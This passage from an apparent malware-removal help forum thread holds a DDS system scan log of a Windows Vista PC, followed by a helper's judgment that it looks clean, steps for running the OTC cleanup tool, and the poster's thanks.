DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} - hxxps://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: {019BBC51-493A-48CD-8901-399505DA1F8B} = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.dll
AppInit_DLLs: c:\windows\system32\guard32.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
================= FIREFOX ===================
FF - ProfilePath - c:\users\lennon\appdata\roaming\mozilla\firefox\profiles\bigxufq1.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.ie/
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.2.145.5\npGoogleOneClick8.dll
FF - plugin: c:\program files\google\update\1.2.183.13\npGoogleOneClick8.dll
FF - plugin: c:\program files\google\update\1.2.183.7\npGoogleOneClick8.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\NPOFFICE.DLL
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin2.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin3.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin4.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin5.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin6.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin7.dll
FF - plugin: c:\program files\opera\program\plugins\np_gp.dll
FF - plugin: c:\program files\opera\program\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\opera\program\plugins\nppl3260.dll
FF - plugin: c:\program files\opera\program\plugins\nprpjplug.dll
FF - plugin: c:\users\lennon\appdata\local\google\update\1.2.183.13\npGoogleOneClick8.dll
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
---- FIREFOX POLICIES ----
c:\program files\mozilla firefox\greprefs\security-prefs.js - pref("security.ssl3.rsa_seed_sha", true);
============= SERVICES / DRIVERS ===============
R1 cmdGuard;COMODO Firewall Pro Sandbox Driver;c:\windows\system32\drivers\cmdguard.sys [2008-8-7 128376]
R1 cmdHlp;COMODO Firewall Pro Helper Driver;c:\windows\system32\drivers\cmdhlp.sys [2008-8-7 29520]
R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2009-6-18 142832]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2009-11-11 9968]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2009-11-11 74480]
R2 AERTFilters;Andrea RT Filters Service;c:\windows\system32\AERTSrv.exe [2007-12-5 77824]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-3-16 180224]
R2 postgresql-8.3;PostgreSQL Server 8.3;C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N "postgresql-8.3" -D "C:/Program Files/PostgreSQL/8.3/data" -w --> C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N postgresql-8.3 [?]
R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2009-6-18 42480]
R3 NmPar;MosChip PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2006-12-19 81408]
R3 SASENUM;SASENUM;c:\program files\superantispyware\SASENUM.SYS [2009-11-11 7408]
S2 gupdate1c9e852b942f080;Google Update Service (gupdate1c9e852b942f080);c:\program files\google\update\GoogleUpdate.exe [2009-6-8 133104]
S3 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-5-29 21504]
S3 IntelDH;IntelDH Driver;c:\windows\system32\drivers\IntelDH.sys [2008-4-24 5632]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2008-5-21 34576]
S3 PSI;PSI;c:\windows\system32\drivers\psi_mf.sys [2009-6-17 12648]
=============== Created Last 30 ================
2009-11-29 20:11:39 0 d-----w- C:\Rooter$
2009-11-28 18:49:16 0 d-----w- c:\programdata\TrueCrypt
2009-11-25 03:01:53 2048 ----a-w- c:\windows\system32\tzres.dll
2009-11-25 02:58:38 1401856 ----a-w- c:\windows\system32\msxml6.dll
2009-11-25 02:58:37 1248768 ----a-w- c:\windows\system32\msxml3.dll
2009-11-25 02:58:35 714240 ----a-w- c:\windows\system32\timedate.cpl
2009-11-20 15:42:41 0 d-----w- c:\users\lennon\appdata\roaming\Malwarebytes
2009-11-20 15:42:36 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-11-20 15:42:35 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-11-20 15:42:35 0 d-----w- c:\programdata\Malwarebytes
2009-11-20 15:42:35 0 d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-11-20 15:36:57 0 d-----w- c:\programdata\SUPERAntiSpyware.com
2009-11-20 15:36:46 0 d-----w- c:\users\lennon\appdata\roaming\SUPERAntiSpyware.com
2009-11-20 15:36:46 0 d-----w- c:\program files\SUPERAntiSpyware
2009-11-20 02:40:08 0 d-----w- c:\program files\MakeMKV
2009-11-11 09:40:51 2036736 ----a-w- c:\windows\system32\win32k.sys
2009-11-11 09:38:52 355328 ----a-w- c:\windows\system32\WSDApi.dll
2009-11-07 15:52:37 0 d-----w- c:\programdata\XHEO INC
2009-11-04 14:32:36 0 d-----w- c:\program files\Windows Portable Devices
2009-11-04 14:32:29 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
2009-11-04 14:31:57 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdFs_01_07_00.Wdf
2009-11-04 14:29:49 81920 ----a-w- c:\windows\system32\wpdbusenum.dll
2009-11-04 14:28:48 4096 ----a-w- c:\windows\system32\oleaccrc.dll
2009-11-04 14:28:48 234496 ----a-w- c:\windows\system32\oleacc.dll
2009-11-04 14:28:47 555520 ----a-w- c:\windows\system32\UIAutomationCore.dll
2009-11-04 13:06:07 1638912 ----a-w- c:\windows\system32\mshtml.tlb
2009-11-03 19:53:49 0 d-----w- c:\program files\iPod
2009-11-03 19:53:48 0 d-----w- c:\program files\iTunes
2009-11-01 14:27:40 0 d-----w- C:\962431762f6499d25e8db0e08e090e
2009-10-31 14:17:13 0 d-----w- C:\5cc8389e2cb2f2f5fc5f494a07
2009-10-31 03:47:16 0 d-----w- c:\program files\MyDefrag v4.2.4
==================== Find3M ====================
2009-11-28 18:49:13 223440 ----a-w- c:\windows\system32\drivers\truecrypt.sys
2009-11-26 15:34:35 171552 ----a-w- c:\windows\system32\guard32.dll
2009-11-26 15:34:29 128376 ----a-w- c:\windows\system32\drivers\cmdguard.sys
2009-11-22 16:35:22 29520 ----a-w- c:\windows\system32\drivers\cmdhlp.sys
2009-11-08 01:24:26 411368 ----a-w- c:\windows\system32\deploytk.dll
2009-11-04 14:32:33 665600 ----a-w- c:\windows\inf\drvindex.dat
2009-11-04 14:32:33 51200 ----a-w- c:\windows\inf\infpub.dat
2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstrng.dat
2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstor.dat
2009-11-02 20:42:06 195456 ------w- c:\windows\system32\MpSigStub.exe
2009-10-03 19:01:00 85504 ----a-w- c:\windows\system32\ff_vfw.dll
2009-10-01 01:02:17 2537472 ----a-w- c:\windows\system32\wpdshext.dll
2009-10-01 01:02:05 30208 ----a-w- c:\windows\system32\WPDShextAutoplay.exe
2009-10-01 01:02:04 334848 ----a-w- c:\windows\system32\PortableDeviceApi.dll
2009-10-01 01:02:02 87552 ----a-w- c:\windows\system32\WPDShServiceObj.dll
2009-10-01 01:02:00 31232 ----a-w- c:\windows\system32\BthMtpContextHandler.dll
2009-10-01 01:01:59 546816 ----a-w- c:\windows\system32\wpd_ci.dll
2009-10-01 01:01:59 160256 ----a-w- c:\windows\system32\PortableDeviceTypes.dll
2009-10-01 01:01:56 60928 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
2009-10-01 01:01:56 350208 ----a-w- c:\windows\system32\WPDSp.dll
2009-10-01 01:01:56 196608 ----a-w- c:\windows\system32\PortableDeviceWMDRM.dll
2009-10-01 01:01:56 100864 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
2009-10-01 01:01:54 40448 ----a-w- c:\windows\system32\drivers\WpdUsb.sys
2009-10-01 01:01:50 226816 ----a-w- c:\windows\system32\WpdMtp.dll
2009-10-01 01:01:49 61952 ----a-w- c:\windows\system32\WpdMtpUS.dll
2009-10-01 01:01:49 33280 ----a-w- c:\windows\system32\WpdConns.dll
2009-09-25 02:10:10 974848 ----a-w- c:\windows\system32\WindowsCodecs.dll
2009-09-25 02:07:08 189440 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2009-09-25 02:04:32 321024 ----a-w- c:\windows\system32\PhotoMetadataHandler.dll
2009-09-25 01:49:22 1554432 ----a-w- c:\windows\system32\xpsservices.dll
2009-09-25 01:48:08 351232 ----a-w- c:\windows\system32\XpsPrint.dll
2009-09-25 01:38:29 847360 ----a-w- c:\windows\system32\OpcServices.dll
2009-09-25 01:36:13 280064 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2009-09-25 01:35:31 135680 ----a-w- c:\windows\system32\XpsRasterService.dll
2009-09-25 01:33:25 195584 ----a-w- c:\windows\system32\dxdiagn.dll
2009-09-25 01:33:15 829440 ----a-w- c:\windows\system32\d3d10warp.dll
2009-09-25 01:33:01 369664 ----a-w- c:\windows\system32\WMPhoto.dll
2009-09-25 01:32:59 252928 ----a-w- c:\windows\system32\dxdiag.exe
2009-09-25 01:31:53 519680 ----a-w- c:\windows\system32\d3d11.dll
2009-09-25 01:31:26 486912 ----a-w- c:\windows\system32\d3d10level9.dll
2009-09-25 01:31:21 161280 ----a-w- c:\windows\system32\d3d10_1.dll
2009-09-25 01:31:19 218112 ----a-w- c:\windows\system32\d3d10_1core.dll
2009-09-25 01:31:16 1030144 ----a-w- c:\windows\system32\d3d10.dll
2009-09-25 01:31:15 828928 ----a-w- c:\windows\system32\d2d1.dll
2009-09-25 01:30:23 481792 ----a-w- c:\windows\system32\dxgi.dll
2009-09-25 01:30:23 190464 ----a-w- c:\windows\system32\d3d10core.dll
2009-09-25 01:27:04 793088 ----a-w- c:\windows\system32\FntCache.dll
2009-09-25 01:27:04 37888 ----a-w- c:\windows\system32\cdd.dll
2009-09-25 01:27:04 1064448 ----a-w- c:\windows\system32\DWrite.dll
2009-09-24 22:54:55 258048 ----a-w- c:\windows\system32\winspool.drv
2009-09-24 22:54:53 667648 ----a-w- c:\windows\system32\printfilterpipelinesvc.exe
2009-09-24 22:54:52 26112 ----a-w- c:\windows\system32\printfilterpipelineprxy.dll
2009-09-10 16:48:01 218624 ----a-w- c:\windows\system32\msv1_0.dll
2009-09-10 14:59:26 8147456 ----a-w- c:\windows\system32\wmploc.DLL
2009-09-10 14:58:28 310784 ----a-w- c:\windows\system32\unregmp2.exe
2009-09-10 02:01:02 3023360 ----a-w- c:\windows\system32\UIRibbon.dll
2009-09-10 02:00:54 1164800 ----a-w- c:\windows\system32\UIRibbonRes.dll
2009-09-10 02:00:36 92672 ----a-w- c:\windows\system32\UIAnimation.dll
2009-09-04 11:41:59 60928 ----a-w- c:\windows\system32\msasn1.dll
2009-08-21 06:16:20 44 ---h--w- c:\program files\232e4158.tmp
2008-05-29 15:00:50 174 --sha-w- c:\program files\desktop.ini
2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfd.dat
2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfc.dat
2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfi.dat
2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfh.dat
2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfi.dat
2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfh.dat
2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfd.dat
2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfc.dat
2008-04-25 01:28:53 8192 --sha-w- c:\windows\users\default\NTUSER.DAT
============= FINISH: 0:11:11.35 ===============
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
DDS (Ver_09-11-29.01)
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume3
Install Date: 24/04/2008 18:43:02
System Uptime: 29/11/2009 18:22:41 (6 hours ago)
Motherboard: Dell Inc. | | 0RY007
Processor: Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz | Socket 775 | 1998/333mhz
==== Disk Partitions =========================
C: is FIXED (NTFS) - 239 GiB total, 92.672 GiB free.
is FIXED (NTFS) - 10 GiB total, 5.788 GiB free.
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
==== Disabled Device Manager Items =============
==== System Restore Points ===================
RP796: 24/11/2009 04:50:47 - Scheduled Checkpoint
RP797: 24/11/2009 13:20:44 - Windows Update
RP798: 25/11/2009 02:17:47 - Scheduled Checkpoint
RP799: 25/11/2009 03:01:09 - Windows Update
RP800: 26/11/2009 15:37:20 - Windows Update
RP801: 27/11/2009 13:33:27 - Scheduled Checkpoint
RP802: 27/11/2009 21:42:39 - Windows Update
RP803: 28/11/2009 06:26:03 - Windows Update
RP804: 28/11/2009 18:43:10 - Installed Opera 10.10.
RP806: 28/11/2009 18:48:58 - TrueCrypt installation
RP807: 29/11/2009 18:34:07 - Windows Update
==== Installed Programs ======================
7-Zip 4.65
AC3Filter 1.62b
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
AoA Audio Extractor 1.0
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI Catalyst Install Manager
AutoHotkey 1.0.48.03
AviSynth 2.5
Betfair Poker
Betsafe Poker
Blue Face Network Tester
Bonjour
Browser Address Error Redirector
bwin Poker
CarbonPoker
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center HydraVision Full
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help English
CCC Help Japanese
CCC Help Korean
CCC Help Thai
CDPoker
COMODO Firewall Pro
Compatibility Pack for the 2007 Office system
Dell Getting Started Guide
Dell Support Center
DellSupport
Eraser
Everest Poker (Remove Only)
FastStone Image Viewer 3.9
ffdshow [rev 3094] [2009-10-03]
FileHippo.com Update Checker
Foxit Reader
Gnuf.com Poker
Google Chrome
Google Earth
Google Update Helper
GrabIt 1.7.2 Beta 4 (build 997)
Haali Media Splitter
HijackThis 2.0.2
Holdem Manager
HollywoodPoker.com
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Intel(R) Network Connections 13.5.32.0
IrfanView (remove only)
iTunes
Java(TM) 6 Update 17
JGoodies JDiskReport 1.3.1
KeePass Password Safe 1.16
Ladbrokes Poker
Littlewoods Poker
MakeMKV v1.4.8_beta
Malwarebytes' Anti-Malware
MansionPoker
Media Player Classic - Home Cinema v. 1.3.1249.0
MediaInfo 0.7.25
MeGUI (remove only)
Microsoft .NET Framework 3.5 SP1
Microsoft Antimalware
Microsoft Application Error Reporting
Microsoft Choice Guard
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Professional Edition 2003
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Works
mkv2vob
MKVtoolnix 2.9.8
MobileMe Control Panel
MosChip Multi-IO Controller
Mozilla Firefox (3.5)
Mozilla Firefox (3.5.5)
Mozilla Thunderbird (2.0.0.19)
Mozilla Thunderbird (2.0.0.23)
MSVCRT
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MyDefrag v4.2.4
Noble Poker
Notepad++
OGA Notifier 2.0.0048.0
Opera 10.10
Pacific Poker
PartyPoker
PingPlotter Standard 3.30.0s
Poker
Poker 770
PokerStars
PokerStove version 1.21
PostgreSQL 8.3
Psi (remove only)
Purple Lounge
QuickPar 0.9
QuickTime
Real Alternative 2.0.1 Lite
Realtek High Definition Audio Driver
RedKings Poker
Roxio Creator Audio
Roxio Creator Copy
Roxio Creator Data
Roxio Creator DE
Roxio Creator Tools
Roxio Express Labeler 3
Roxio Update Manager
SABnzbd (remove only)
SeaMonkey (2.0)
Secunia PSI
Shareaza 2.5.0.0
Skins
SopCast 3.2.4
SUPERAntiSpyware Free Edition
Titan Poker
Tower Gaming
TrueCrypt
TVAnts 1.0
TVersity Codec Pack 1.2
TVersity Media Server 1.7.2.1 Beta
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
User's Guides
VLC media player 1.0.3
Winamp
Windows Live Call
Windows Live Communications Platform
Windows Live Essentials
Windows Live Messenger
Windows Live Sign-in Assistant
Windows Live Upload Tool
WinPcap 4.1 beta4
WinSCP 4.1.9
==== Event Viewer Messages From Past Week ========
29/11/2009 05:04:12, Error: Service Control Manager [7034] - The COMODO Internet Security Helper
Service service terminated unexpectedly. It has done this 1 time(s).
28/11/2009 16:39:27, Error: Service Control Manager [7000] - The SASDIFSV service failed to
start due to the following error: Cannot create a file when that file already exists.
28/11/2009 05:29:09, Error: Ntfs [137] - The default transaction resource manager on volume S:
encountered a non-retryable error and could not start. The data contains the error code.
==== End Of File ===========================
looks fine, I wouldn't worry
- Download OTC to your desktop and run it
- Click Yes to begin the Cleanup process and remove these components, including this application.
- You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
Thanks ASJ, I hope I can speak for others here when I say that we really appreciate the work you do in this forum.